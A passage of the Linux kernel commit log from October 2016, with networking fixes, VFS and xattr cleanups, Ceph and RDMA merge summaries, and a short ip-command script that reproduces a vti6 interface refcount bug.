Reported-by: Daniel Borkmann <daniel@iogearbox.net>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-12 01:56:04 -04:00
Ursula Braun
4e0ad32216 Subject: [PATCH] af_iucv: enable control sends in case of SEND_SHUTDOWN
If a socket program has shut down the socket for sending, it can still
receive an undetermined number of packets. The AF_IUCV protocol for
HIPER transport requires sending of a WIN flag from time to time
from the receiver to the sender, otherwise the peer cannot continue
sending. That means sending of control flags must still work, even
though the AF_IUCV socket is shutdown for sending data.
sock_alloc_send_skb() returns with error EPIPE, if socket sk_shutdown
is SEND_SHUTDOWN. Thus this patch temporarily removes the send
shutdown attribute from the socket to enable transfer of control
flags.

Signed-off-by: Ursula Braun <ubraun@linux.vnet.ibm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-12 01:56:04 -04:00
Geert Uytterhoeven
6d3a4c4046 strparser: Propagate correct error code in strp_recv()
With m68k-linux-gnu-gcc-4.1:

    net/strparser/strparser.c: In function ‘strp_recv’:
    net/strparser/strparser.c:98: warning: ‘err’ may be used uninitialized in this function

Pass "len" (which is an error code when negative) instead of the
uninitialized "err" variable to fix this.

Fixes: 43a0c6751a ("strparser: Stream parser for messages")
Signed-off-by: Geert Uytterhoeven <geert@linux-m68k.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-12 01:51:49 -04:00
Jiri Benc
c66549ffd6 openvswitch: correctly fragment packet with mpls headers
If mpls headers were pushed to a defragmented packet, the refragmentation no
longer works correctly after 48d2ab609b ("net: mpls: Fixups for GSO"). The
network header has to be shifted after the mpls headers for the
fragmentation and restored afterwards.

Fixes: 48d2ab609b ("net: mpls: Fixups for GSO")
Signed-off-by: Jiri Benc <jbenc@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-12 01:42:52 -04:00
Philippe Reynes
bb10bb3ea8 net: dsa: slave: use new api ethtool_{get|set}_link_ksettings
The ethtool api {get|set}_settings is deprecated.
We move this driver to new api {get|set}_link_ksettings.

Signed-off-by: Philippe Reynes <tremyfr@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-12 01:40:25 -04:00
Masahiro Yamada
97139d4a6f treewide: remove redundant #include <linux/kconfig.h>
Kernel source files need not include <linux/kconfig.h> explicitly
because the top Makefile forces to include it with:

  -include $(srctree)/include/linux/kconfig.h

This commit removes explicit includes except the following:

  * arch/s390/include/asm/facilities_src.h
  * tools/testing/radix-tree/linux/kernel.h

These two are used for host programs.

Link: http://lkml.kernel.org/r/1473656164-11929-1-git-send-email-yamada.masahiro@socionext.com
Signed-off-by: Masahiro Yamada <yamada.masahiro@socionext.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2016-10-11 15:06:33 -07:00
Linus Torvalds
6b5e09a748 Merge git://git.kernel.org/pub/scm/linux/kernel/git/davem/net
Pull networking fixes from David Miller:

 1) Netfilter list handling fix, from Linus.

 2) RXRPC/AFS bug fixes from David Howells (oops on call to serviceless
    endpoints, build warnings, missing notifications, etc.) From David
    Howells.

 3) Kernel log message missing newlines, from Colin Ian King.

 4) Don't enter direct reclaim in netlink dumps, the idea is to use a
    high order allocation first and fallback quickly to a 0-order
    allocation if such a high-order one cannot be done cheaply and
    without reclaim. From Eric Dumazet.

 5) Fix firmware download errors in btusb bluetooth driver, from Ethan
    Hsieh.

 6) Missing Kconfig deps for QCOM_EMAC, from Geert Uytterhoeven.

 7) Fix MDIO_XGENE dup Kconfig entry. From Laura Abbott.

 8) Constrain ipv6 rtr_solicits sysctl values properly, from Maciej
    Żenczykowski.

* git://git.kernel.org/pub/scm/linux/kernel/git/davem/net: (65 commits)
  netfilter: Fix slab corruption.
  be2net: Enable VF link state setting for BE3
  be2net: Fix TX stats for TSO packets
  be2net: Update Copyright string in be_hw.h
  be2net: NCSI FW section should be properly updated with ethtool for BE3
  be2net: Provide an alternate way to read pf_num for BEx chips
  wan/fsl_ucc_hdlc: Fix size used in dma_free_coherent()
  net: macb: NULL out phydev after removing mdio bus
  xen-netback: make sure that hashes are not send to unaware frontends
  Fixing a bug in team driver due to incorrect 'unsigned int' to 'int' conversion
  MAINTAINERS: add myself as a maintainer of xen-netback
  ipv6 addrconf: disallow rtr_solicits < -1
  Bluetooth: btusb: Fix atheros firmware download error
  drivers: net: phy: Correct duplicate MDIO_XGENE entry
  ethernet: qualcomm: QCOM_EMAC should depend on HAS_DMA and HAS_IOMEM
  net: ethernet: mediatek: remove hwlro property in the device tree
  net: ethernet: mediatek: get hw lro capability by the chip id instead of by the dtsi
  net: ethernet: mediatek: get the chip id by ETHDMASYS registers
  net: bgmac: Fix errant feature flag check
  netlink: do not enter direct reclaim from netlink_dump()
  ...
2016-10-11 08:10:19 -07:00
Nicolas Dichtel
7f92083eb5 vti6: flush x-netns xfrm cache when vti interface is removed
This is the same fix than commit a5d0dc810a ("vti: flush x-netns xfrm
cache when vti interface is removed")

This patch fixes a refcnt problem when a x-netns vti6 interface is removed:
unregister_netdevice: waiting for vti6_test to become free. Usage count = 1

Here is a script to reproduce the problem:

ip link set dev ntfp2 up
ip addr add dev ntfp2 2001::1/64
ip link add vti6_test type vti6 local 2001::1 remote 2001::2 key 1
ip netns add secure
ip link set vti6_test netns secure
ip netns exec secure ip link set vti6_test up
ip netns exec secure ip link s lo up
ip netns exec secure ip addr add dev vti6_test 2003::1/64
ip -6 xfrm policy add dir out tmpl src 2001::1 dst 2001::2 proto esp \
	   mode tunnel mark 1
ip -6 xfrm policy add dir in tmpl src 2001::2 dst 2001::1 proto esp \
	   mode tunnel mark 1
ip xfrm state add src 2001::1 dst 2001::2 proto esp spi 1 mode tunnel \
	   enc des3_ede 0x112233445566778811223344556677881122334455667788 mark 1
ip xfrm state add src 2001::2 dst 2001::1 proto esp spi 1 mode tunnel \
	   enc des3_ede 0x112233445566778811223344556677881122334455667788 mark 1
ip netns exec secure  ping6 -c 4 2003::2
ip netns del secure

CC: Lance Richardson <lrichard@redhat.com>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Acked-by: Lance Richardson <lrichard@redhat.com>
Signed-off-by: Steffen Klassert <steffen.klassert@secunet.com>
2016-10-11 10:46:44 +02:00
Linus Torvalds
bd3769bfed netfilter: Fix slab corruption.
Use the correct pattern for singly linked list insertion and
deletion.  We can also calculate the list head outside of the
mutex.

Fixes: e3b37f11e6 ("netfilter: replace list_head with single linked list")
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
Reviewed-by: Aaron Conole <aconole@bytheb.org>
Signed-off-by: David S. Miller <davem@davemloft.net>

net/netfilter/core.c | 108 ++++++++++++++++-----------------------------------
 1 file changed, 33 insertions(+), 75 deletions(-)
2016-10-11 04:44:37 -04:00
Linus Torvalds
101105b171 Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs
Pull more vfs updates from Al Viro:
 ">rename2() work from Miklos + current_time() from Deepa"

* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs:
  fs: Replace current_fs_time() with current_time()
  fs: Replace CURRENT_TIME_SEC with current_time() for inode timestamps
  fs: Replace CURRENT_TIME with current_time() for inode timestamps
  fs: proc: Delete inode time initializations in proc_alloc_inode()
  vfs: Add current_time() api
  vfs: add note about i_op->rename changes to porting
  fs: rename "rename2" i_op to "rename"
  vfs: remove unused i_op->rename
  fs: make remaining filesystems use .rename2
  libfs: support RENAME_NOREPLACE in simple_rename()
  fs: support RENAME_NOREPLACE for local filesystems
  ncpfs: fix unused variable warning
2016-10-10 20:16:43 -07:00
Al Viro
3873691e5a Merge remote-tracking branch 'ovl/rename2' into for-linus 2016-10-10 23:02:51 -04:00
Linus Torvalds
97d2116708 Merge branch 'work.xattr' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs
Pull vfs xattr updates from Al Viro:
 "xattr stuff from Andreas

  This completes the switch to xattr_handler ->get()/->set() from
  ->getxattr/->setxattr/->removexattr"

* 'work.xattr' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs:
  vfs: Remove {get,set,remove}xattr inode operations
  xattr: Stop calling {get,set,remove}xattr inode operations
  vfs: Check for the IOP_XATTR flag in listxattr
  xattr: Add __vfs_{get,set,remove}xattr helpers
  libfs: Use IOP_XATTR flag for empty directory handling
  vfs: Use IOP_XATTR flag for bad-inode handling
  vfs: Add IOP_XATTR inode operations flag
  vfs: Move xattr_resolve_name to the front of fs/xattr.c
  ecryptfs: Switch to generic xattr handlers
  sockfs: Get rid of getxattr iop
  sockfs: getxattr: Fail with -EOPNOTSUPP for invalid attribute names
  kernfs: Switch to generic xattr handlers
  hfs: Switch to generic xattr handlers
  jffs2: Remove jffs2_{get,set,remove}xattr macros
  xattr: Remove unnecessary NULL attribute name check
2016-10-10 17:11:50 -07:00
Emese Revfy
0766f788eb latent_entropy: Mark functions with __latent_entropy
The __latent_entropy gcc attribute can be used only on functions and
variables.  If it is on a function then the plugin will instrument it for
gathering control-flow entropy. If the attribute is on a variable then
the plugin will initialize it with random contents.  The variable must
be an integer, an integer array type or a structure with integer fields.

These specific functions have been selected because they are init
functions (to help gather boot-time entropy), are called at unpredictable
times, or they have variable loops, each of which provide some level of
latent entropy.

Signed-off-by: Emese Revfy <re.emese@gmail.com>
[kees: expanded commit message]
Signed-off-by: Kees Cook <keescook@chromium.org>
2016-10-10 14:51:45 -07:00
Linus Torvalds
8dfb790b15 The big ticket item here is support for rbd exclusive-lock feature,
with maintenance operations offloaded to userspace (Douglas Fuller,
 Mike Christie and myself).  Another block device bullet is a series
 fixing up layering error paths (myself).
 
 On the filesystem side, we've got patches that improve our handling of
 buffered vs dio write races (Neil Brown) and a few assorted fixes from
 Zheng.  Also included a couple of random cleanups and a minor CRUSH
 update.
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v2
 
 iQEcBAABCAAGBQJX+PjZAAoJEEp/3jgCEfOLVuoH/RwtFLIb6/KZUYtBOrVVrTun
 kReRlfq2xKYrGGtyQEqSuz7fBdwT1LVCVcL8kC4GFD4R67o+tNMAr6PfM/7pZABj
 HRoRLgSZ9FLw4W5n0VpBIznih75QUbCdXiTCtH9eorMHU5q1YpTvVHHlF9W9Pm2I
 eNGnBWpGyHVeiK66mpUCH+EQKQ4GkAVD9rneTNqLHgq2yotHkVl1j258+DL6JRGs
 OBoh3RmNQaGOAS37Lss8erCSusAGEcAeGV6ubuK2lFUKyR41EkD3I0xkhNSPe+CD
 RifFcpVziIeTu//cLgl0nnHGtmUytD7HgJubaPthArKIOen9ZDAfEkgI0o+JI2A=
 =45O7
 -----END PGP SIGNATURE-----

Merge tag 'ceph-for-4.9-rc1' of git://github.com/ceph/ceph-client

Pull Ceph updates from Ilya Dryomov:
 "The big ticket item here is support for rbd exclusive-lock feature,
  with maintenance operations offloaded to userspace (Douglas Fuller,
  Mike Christie and myself). Another block device bullet is a series
  fixing up layering error paths (myself).

  On the filesystem side, we've got patches that improve our handling of
  buffered vs dio write races (Neil Brown) and a few assorted fixes from
  Zheng. Also included a couple of random cleanups and a minor CRUSH
  update"

* tag 'ceph-for-4.9-rc1' of git://github.com/ceph/ceph-client: (39 commits)
  crush: remove redundant local variable
  crush: don't normalize input of crush_ln iteratively
  libceph: ceph_build_auth() doesn't need ceph_auth_build_hello()
  libceph: use CEPH_AUTH_UNKNOWN in ceph_auth_build_hello()
  ceph: fix description for rsize and rasize mount options
  rbd: use kmalloc_array() in rbd_header_from_disk()
  ceph: use list_move instead of list_del/list_add
  ceph: handle CEPH_SESSION_REJECT message
  ceph: avoid accessing / when mounting a subpath
  ceph: fix mandatory flock check
  ceph: remove warning when ceph_releasepage() is called on dirty page
  ceph: ignore error from invalidate_inode_pages2_range() in direct write
  ceph: fix error handling of start_read()
  rbd: add rbd_obj_request_error() helper
  rbd: img_data requests don't own their page array
  rbd: don't call rbd_osd_req_format_read() for !img_data requests
  rbd: rework rbd_img_obj_exists_submit() error paths
  rbd: don't crash or leak on errors in rbd_img_obj_parent_read_full_callback()
  rbd: move bumping img_request refcount into rbd_obj_request_submit()
  rbd: mark the original request as done if stat request fails
  ...
2016-10-10 13:52:05 -07:00
Linus Torvalds
b9044ac829 Merge of primary rdma-core code for 4.9
- Updates to mlx5
 - Updates to mlx4 (two conflicts, both minor and easily resolved)
 - Updates to iw_cxgb4 (one conflict, not so obvious to resolve, proper
   resolution is to keep the code in cxgb4_main.c as it is in Linus'
   tree as attach_uld was refactored and moved into cxgb4_uld.c)
 - Improvements to uAPI (moved vendor specific API elements to uAPI area)
 - Add hns-roce driver and hns and hns-roce ACPI reset support
 - Conversion of all rdma code away from deprecated
   create_singlethread_workqueue
 - Security improvement: remove unsafe ib_get_dma_mr (breaks lustre in
   staging)
 -----BEGIN PGP SIGNATURE-----
 
 iQIcBAABAgAGBQJX+AwSAAoJELgmozMOVy/d0WkQAKxPzVccMWwHv28iZI4ey13u
 JwE+VoCNpCAZAVuEgzK5zzFdNHPvAk2jU93H4apA7dfXJBXPatVuj9Lnk+ieEEnW
 tbFwJjBpbQ3Zol3+SPfAHnsVMbtax+xmd6WDKExPXXEDl1L6rutwL3KKfmgWEitg
 ysX7XOJCiSdyM0hcg4T6UPB9a3jGPff9NLu0oGamV+yoUk5Y0WGoVFxHZ4MKcw8t
 OkFBYIxGz4SGwq2tulStuH03HteURX594KngtrA8dyq6l1R2GlGRv+bkJAUEIWUv
 aA0ow3VWusOM6fT+jLXPCv8iUwIXM8tR/U6F7X+cmORUUtWvCl+uCUVid113j/aN
 BK+Af2nJnfoJ5cDBPsD+bC76l5gQycNZO/Qh8op2kmgJtD+6OpGM3cBXsHx53+kk
 0wloJ2lKCGShWxNj+ig8n8rR/rhhs/x3vV3ouCVWNMbOUgOSN3eYHxmK3wGFW4nd
 Qx+WYCjj9Yi/J6nmUDcfEQ4NWPR22Q2+0ENAabfhLhV6mDloAO5ILHd4GDqC3IA9
 UtxlVjf4ZonaiLnTQQzCnDMGVVk6tT8FJ9D42s0ScwjbdYwjyCW9/rs/g2EhcprR
 Cc+AmjqLviCWGtzBSFO0SijqQon8lcQOwdLw61CdFFvPa/mlLdf1rbx9ArIyNVKn
 JSrbr3CGyoqyYj6qaEO5
 =LC+S
 -----END PGP SIGNATURE-----

Merge tag 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/dledford/rdma

Pull main rdma updates from Doug Ledford:
 "This is the main pull request for the rdma stack this release.  The
  code has been through 0day and I had it tagged for linux-next testing
  for a couple days.

  Summary:

   - updates to mlx5

   - updates to mlx4 (two conflicts, both minor and easily resolved)

   - updates to iw_cxgb4 (one conflict, not so obvious to resolve,
     proper resolution is to keep the code in cxgb4_main.c as it is in
     Linus' tree as attach_uld was refactored and moved into
     cxgb4_uld.c)

   - improvements to uAPI (moved vendor specific API elements to uAPI
     area)

   - add hns-roce driver and hns and hns-roce ACPI reset support

   - conversion of all rdma code away from deprecated
     create_singlethread_workqueue

   - security improvement: remove unsafe ib_get_dma_mr (breaks lustre in
     staging)"

* tag 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/dledford/rdma: (75 commits)
  staging/lustre: Disable InfiniBand support
  iw_cxgb4: add fast-path for small REG_MR operations
  cxgb4: advertise support for FR_NSMR_TPTE_WR
  IB/core: correctly handle rdma_rw_init_mrs() failure
  IB/srp: Fix infinite loop when FMR sg[0].offset != 0
  IB/srp: Remove an unused argument
  IB/core: Improve ib_map_mr_sg() documentation
  IB/mlx4: Fix possible vl/sl field mismatch in LRH header in QP1 packets
  IB/mthca: Move user vendor structures
  IB/nes: Move user vendor structures
  IB/ocrdma: Move user vendor structures
  IB/mlx4: Move user vendor structures
  IB/cxgb4: Move user vendor structures
  IB/cxgb3: Move user vendor structures
  IB/mlx5: Move and decouple user vendor structures
  IB/{core,hw}: Add constant for node_desc
  ipoib: Make ipoib_warn ratelimited
  IB/mlx4/alias_GUID: Remove deprecated create_singlethread_workqueue
  IB/ipoib_verbs: Remove deprecated create_singlethread_workqueue
  IB/ipoib: Remove deprecated create_singlethread_workqueue
  ...
2016-10-09 17:04:33 -07:00
David S. Miller
2f7c68d8e6 Merge branch 'for-upstream' of git://git.kernel.org/pub/scm/linux/kernel/git/bluetooth/bluetooth
Johan Hedberg says:

====================
pull request: bluetooth 2016-10-08

Here are a couple of Bluetooth fixes for the 4.9 kernel:

 - Firmware download fix for Atheros controllers
 - Fixes to the content of LE scan response
 - New USB ID for a Marvell chipset

Please let me know if there are any issues pulling. Thanks.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-08 08:24:37 -04:00
Linus Torvalds
b66484cd74 Merge branch 'akpm' (patches from Andrew)
Merge updates from Andrew Morton:

 - fsnotify updates

 - ocfs2 updates

 - all of MM

* emailed patches from Andrew Morton <akpm@linux-foundation.org>: (127 commits)
  console: don't prefer first registered if DT specifies stdout-path
  cred: simpler, 1D supplementary groups
  CREDITS: update Pavel's information, add GPG key, remove snail mail address
  mailmap: add Johan Hovold
  .gitattributes: set git diff driver for C source code files
  uprobes: remove function declarations from arch/{mips,s390}
  spelling.txt: "modeled" is spelt correctly
  nmi_backtrace: generate one-line reports for idle cpus
  arch/tile: adopt the new nmi_backtrace framework
  nmi_backtrace: do a local dump_stack() instead of a self-NMI
  nmi_backtrace: add more trigger_*_cpu_backtrace() methods
  min/max: remove sparse warnings when they're nested
  Documentation/filesystems/proc.txt: add more description for maps/smaps
  mm, proc: fix region lost in /proc/self/smaps
  proc: fix timerslack_ns CAP_SYS_NICE check when adjusting self
  proc: add LSM hook checks to /proc/<tid>/timerslack_ns
  proc: relax /proc/<tid>/timerslack_ns capability requirements
  meminfo: break apart a very long seq_printf with #ifdefs
  seq/proc: modify seq_put_decimal_[u]ll to take a const char *, not char
  proc: faster /proc/*/status
  ...
2016-10-07 21:38:00 -07:00
Maciej Żenczykowski
cb4a4c691e ipv6 addrconf: disallow rtr_solicits < -1
This disallows setting /proc/sys/net/ipv6/conf/*/router_solicitations
to values below -1.

-1 continues to mean an unlimited number of retransmits.

Note: this depends on 'ipv6 addrconf: remove addrconf_sysctl_hop_limit()'

Signed-off-by: Maciej Żenczykowski <maze@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-07 23:43:56 -04:00
Andreas Gruenbacher
fd50ecaddf vfs: Remove {get,set,remove}xattr inode operations
These inode operations are no longer used; remove them.

Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
2016-10-07 21:48:36 -04:00
Alexey Dobriyan
81243eacfa cred: simpler, 1D supplementary groups
Current supplementary groups code can massively overallocate memory and
is implemented in a way so that access to individual gid is done via 2D
array.

If number of gids is <= 32, memory allocation is more or less tolerable
(140/148 bytes).  But if it is not, code allocates full page (!)
regardless and, what's even more fun, doesn't reuse small 32-entry
array.

2D array means dependent shifts, loads and LEAs without possibility to
optimize them (gid is never known at compile time).

All of the above is unnecessary.  Switch to the usual
trailing-zero-len-array scheme.  Memory is allocated with
kmalloc/vmalloc() and only as much as needed.  Accesses become simpler
(LEA 8(gi,idx,4) or even without displacement).

Maximum number of gids is 65536 which translates to 256KB+8 bytes.  I
think kernel can handle such allocation.

On my usual desktop system with whole 9 (nine) aux groups, struct
group_info shrinks from 148 bytes to 44 bytes, yay!

Nice side effects:

 - "gi->gid[i]" is shorter than "GROUP_AT(gi, i)", less typing,

 - fix little mess in net/ipv4/ping.c
   should have been using GROUP_AT macro but this point becomes moot,

 - aux group allocation is persistent and should be accounted as such.

Link: http://lkml.kernel.org/r/20160817201927.GA2096@p183.telecom.by
Signed-off-by: Alexey Dobriyan <adobriyan@gmail.com>
Cc: Vasily Kulikov <segoon@openwall.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2016-10-07 18:46:30 -07:00
Johannes Weiner
2d75807383 mm: memcontrol: consolidate cgroup socket tracking
The cgroup core and the memory controller need to track socket ownership
for different purposes, but the tracking sites being entirely different
is kind of ugly.

Be a better citizen and rename the memory controller callbacks to match
the cgroup core callbacks, then move them to the same place.

[akpm@linux-foundation.org: coding-style fixes]
Link: http://lkml.kernel.org/r/20160914194846.11153-3-hannes@cmpxchg.org
Signed-off-by: Johannes Weiner <hannes@cmpxchg.org>
Acked-by: Tejun Heo <tj@kernel.org>
Cc: "David S. Miller" <davem@davemloft.net>
Cc: Michal Hocko <mhocko@suse.cz>
Cc: Vladimir Davydov <vdavydov@virtuozzo.com>
Signed-off-by: Andrew Morton <akpm@linux-foundation.org>
Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
2016-10-07 18:46:29 -07:00
Linus Torvalds
d1f5323370 Merge branch 'work.splice_read' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs
Pull VFS splice updates from Al Viro:
 "There's a bunch of branches this cycle, both mine and from other folks
  and I'd rather send pull requests separately.

  This one is the conversion of ->splice_read() to ITER_PIPE iov_iter
  (and introduction of such). Gets rid of a lot of code in fs/splice.c
  and elsewhere; there will be followups, but these are for the next
  cycle...  Some pipe/splice-related cleanups from Miklos in the same
  branch as well"

* 'work.splice_read' of git://git.kernel.org/pub/scm/linux/kernel/git/viro/vfs:
  pipe: fix comment in pipe_buf_operations
  pipe: add pipe_buf_steal() helper
  pipe: add pipe_buf_confirm() helper
  pipe: add pipe_buf_release() helper
  pipe: add pipe_buf_get() helper
  relay: simplify relay_file_read()
  switch default_file_splice_read() to use of pipe-backed iov_iter
  switch generic_file_splice_read() to use of ->read_iter()
  new iov_iter flavour: pipe-backed
  fuse_dev_splice_read(): switch to add_to_pipe()
  skb_splice_bits(): get rid of callback
  new helper: add_to_pipe()
  splice: lift pipe_lock out of splice_to_pipe()
  splice: switch get_iovec_page_array() to iov_iter
  splice_to_pipe(): don't open-code wakeup_pipe_readers()
  consistent treatment of EFAULT on O_DIRECT read/write
2016-10-07 15:36:58 -07:00
Andreas Gruenbacher
bba0bd31b1 sockfs: Get rid of getxattr iop
If we allow pseudo-filesystems created with mount_pseudo to have xattr
handlers, we can replace sockfs_getxattr with a sockfs_xattr_get handler
to use the xattr handler name parsing.

Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
2016-10-06 22:17:38 -04:00
Andreas Gruenbacher
971df15bd5 sockfs: getxattr: Fail with -EOPNOTSUPP for invalid attribute names
The standard return value for unsupported attribute names is
-EOPNOTSUPP, as opposed to undefined but supported attributes
(-ENODATA).

Also, fail for attribute names like "system.sockprotonameXXX" and
simplify the code a bit.

Signed-off-by: Andreas Gruenbacher <agruenba@redhat.com>
Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
2016-10-06 22:17:38 -04:00
David S. Miller
0d818c2889 RxRPC rewrite
-----BEGIN PGP SIGNATURE-----
 
 iQIVAwUAV/YbX/Sw1s6N8H32AQLwDg//W0fGt3OSFrOpEQHtKUSCWO3m4RRJgn/m
 Xbaz8ZO6Z8qmdkM267yrLCAp5hx0E77WP46l7V3B9p9wX0vA+P2QO7K5Kis6sNaY
 aceCCAKHqvUSiZa8tQ2aGpbxxa8qICbjHjiCg0lFABiGDWGRnIBNW8qV5LyGKZkI
 7b3i9MGBkGLdZxetcJd498j6Gck9cuqOZDnfqgb0Q5pAtsjVM3EZXXsHO1ZD5WHG
 GUieQgY9Tp0rlVKjlLdR94fW/acMZYs0c5RO1uzGAoUeBALnSUS5+bSRSlGp1KOM
 C7r5/dK4FvkZY+xuS5pLXoI8WpsA4EDpBINGdO6L03wTJ10zx5y5CdTTl7G6Y53R
 BpmY8SDFmWYqpJs+gZiWYIlbnBQ+b0Mu7p7rKeSJS/q0+YEVwJlz3UFo2k1O+J3A
 ovpxP5E6IvOjlKF21Zs1hOR2m/sfR42v/TfwpApImSeY2k2m8vzyfXBJP4ClAk29
 PGYOOqMLYwzIjLwdapDxL3ccjKvOwYeClCs1t6bKva2XCrF1ybtBnAQDxFp6KzXi
 p/y/QkHnseSeYct8mElDopRekbwoqa9YPwXn7lagvQhNxqNGIR4HT82IeohI/Dqe
 GtQbjSPc3uebk5lRf535kTZixu+l5/yKQeuRTsfoIgsMjVlMdqS9dUAphzI4IXLp
 FE0q49uLTVI=
 =+Jr3
 -----END PGP SIGNATURE-----

Merge tag 'rxrpc-rewrite-20161004' of git://git.kernel.org/pub/scm/linux/kernel/git/dhowells/linux-fs

David Howells says:

====================
rxrpc: Fixes

This set of patches contains a bunch of fixes:

 (1) Fix an oops on incoming call to a local endpoint without a bound
     service.

 (2) Only ping for a lost reply in a client call (this is inapplicable to
     service calls).

 (3) Fix maybe uninitialised variable warnings in the ACK/ABORT sending
     function by splitting it.

 (4) Fix loss of PING RESPONSE ACKs due to them being subsumed by PING ACK
     generation.

 (5) OpenAFS improperly terminates calls it makes as a client under some
     circumstances by not fully hard-ACK'ing the last DATA packets.  This
     is alleviated by a new call appearing on the same channel implicitly
     completing the previous call on that channel.  Handle this implicit
     completion.

 (6) Properly handle expiry of service calls due to the aforementioned
     improper termination with no follow up call to implicitly complete it:

     (a) The call's background processor needs to be queued to complete the
     	 call, send an abort and notify the socket.

     (b) The call's background processor needs to notify the socket (or the
     	 kernel service) when it has completed the call.

     (c) A negative error code must thence be returned to the kernel
     	 service so that it knows the call died.

     (d) The AFS filesystem must detect the fatal error and end the call.

 (7) Must produce a DELAY ACK when the actual service operation takes a
     while to process and must cancel the ACK when the reply is ready.

 (8) Don't request an ACK on the last DATA packet of the Tx phase as this
     confuses OpenAFS.
====================

Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-06 21:04:24 -04:00
Eric Dumazet
d35c99ff77 netlink: do not enter direct reclaim from netlink_dump()
Since linux-3.15, netlink_dump() can use up to 16384 bytes skb
allocations.

Due to struct skb_shared_info ~320 bytes overhead, we end up using
order-3 (on x86) page allocations, that might trigger direct reclaim and
add stress.

The intent was really to attempt a large allocation but immediately
fallback to a smaller one (order-1 on x86) in case of memory stress.

On recent kernels (linux-4.4), we can remove __GFP_DIRECT_RECLAIM to
meet the goal. Old kernels would need to remove __GFP_WAIT

While we are at it, since we do an order-3 allocation, allow to use
all the allocated bytes instead of 16384 to reduce syscalls during
large dumps.

iproute2 already uses 32KB recvmsg() buffer sizes.

Alexei provided an initial patch downsizing to SKB_WITH_OVERHEAD(16384)

Fixes: 9063e21fb0 ("netlink: autosize skb lengthes")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Alexei Starovoitov <ast@kernel.org>
Cc: Greg Thelen <gthelen@google.com>
Reviewed-by: Greg Rose <grose@lightfleet.com>
Acked-by: Alexei Starovoitov <ast@kernel.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-06 20:53:13 -04:00
Anoob Soman
6664498280 packet: call fanout_release, while UNREGISTERING a netdev
If a socket has FANOUT sockopt set, a new proto_hook is registered
as part of fanout_add(). When processing a NETDEV_UNREGISTER event in
af_packet, __fanout_unlink is called for all sockets, but prot_hook which was
registered as part of fanout_add is not removed. Call fanout_release, on a
NETDEV_UNREGISTER, which removes prot_hook and removes fanout from the
fanout_list.

This fixes BUG_ON(!list_empty(&dev->ptype_specific)) in netdev_run_todo()

Signed-off-by: Anoob Soman <anoob.soman@citrix.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
2016-10-06 20:50:18 -04:00
Linus Torvalds
14986a34e1 Merge branch 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/ebiederm/user-namespace
Pull namespace updates from Eric Biederman:
 "This set of changes is a number of smaller things that have been
  overlooked in other development cycles focused on more fundamental
  change. The devpts changes are small things that were a distraction
  until we managed to kill off DEVPTS_MULTPLE_INSTANCES. There is an
  trivial regression fix to autofs for the unprivileged mount changes
  that went in last cycle. A pair of ioctls has been added by Andrey
  Vagin making it is possible to discover the relationships between
  namespaces when referring to them through file descriptors.

  The big user visible change is starting to add simple resource limits
  to catch programs that misbehave. With namespaces in general and user
  namespaces in particular allowing users to use more kinds of
  resources, it has become important to have something to limit errant
  programs. Because the purpose of these limits is to catch errant
  programs the code needs to be inexpensive to use as it always on, and
  the default limits need to be high enough that well behaved programs
  on well behaved systems don't encounter them.

  To this end, after some review I have implemented per user per user
  namespace limits, and use them to limit the number of namespaces. The
  limits being per user mean that one user can not exhause the limits of
  another user. The limits being per user namespace allow contexts where
  the limit is 0 and security conscious folks can remove from their
  threat anlysis the code used to manage namespaces (as they have
  historically done as it root only). At the same time the limits being
  per user namespace allow other parts of the system to use namespaces.

  Namespaces are increasingly being used in application sand boxing
  scenarios so an all or nothing disable for the entire system for the
  security conscious folks makes increasing use of these sandboxes
  impossible.

  There is also added a limit on the maximum number of mounts present in
  a single mount namespace. It is nontrivial to guess what a reasonable
  system wide limit on the number of mount structure in the kernel would
  be, especially as it various based on how a system is using
  containers. A limit on the number of mounts in a mount namespace
  however is much easier to understand and set. In most cases in
  practice only about 1000 mounts are used. Given that some autofs
  scenarious have the potential to be 30,000 to 50,000 mounts I have set
  the default limit for the number of mounts at 100,000 which is well
  above every known set of users but low enough that the mount hash
  tables don't degrade unreaonsably.

  These limits are a start. I expect this estabilishes a pattern that
  other limits for resources that namespaces use will follow. There has
  been interest in making inotify event limits per user per user
  namespace as well as interest expressed in making details about what
  is going on in the kernel more visible"

* 'for-linus' of git://git.kernel.org/pub/scm/linux/kernel/git/ebiederm/user-namespace: (28 commits)
  autofs:  Fix automounts by using current_real_cred()->uid
  mnt: Add a per mount namespace limit on the number of mounts
  netns: move {inc,dec}_net_namespaces into #ifdef
  nsfs: Simplify __ns_get_path
  tools/testing: add a test to check nsfs ioctl-s
